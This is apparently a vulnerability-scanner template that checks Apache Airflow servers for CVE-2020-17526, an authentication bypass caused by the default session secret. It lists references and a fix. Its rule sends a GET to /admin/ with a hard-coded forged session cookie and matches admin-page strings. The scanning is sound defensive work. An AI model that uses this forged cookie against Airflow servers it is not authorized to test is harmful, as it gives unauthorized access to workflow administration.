id: CVE-2020-17526

info:
  name: Apache Airflow <1.10.14 - Authentication Bypass
  author: piyushchhiroliya
  severity: high
  verified: true
  description: |
    Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
    FOFA: Apache Airflow
  reference:
    - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
    - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
    - http://www.openwall.com/lists/oss-security/2020/12/21/1
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17526
  solutions: Change default value for [webserver] secret_key config.
  tags: cve,cve2020,apache,airflow,auth-bypass
  created: 2023/06/16

rules:
  r0:
    request:
      method: GET
      path: /admin/
      headers:
        Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'DAG') &&
      response.body.bcontains(b'Recent Tasks') &&
      response.body.bcontains(b'Users') &&
      response.body.bcontains(b'SLA Misses') &&
      response.body.bcontains(b'Task Instances')
expression: r0()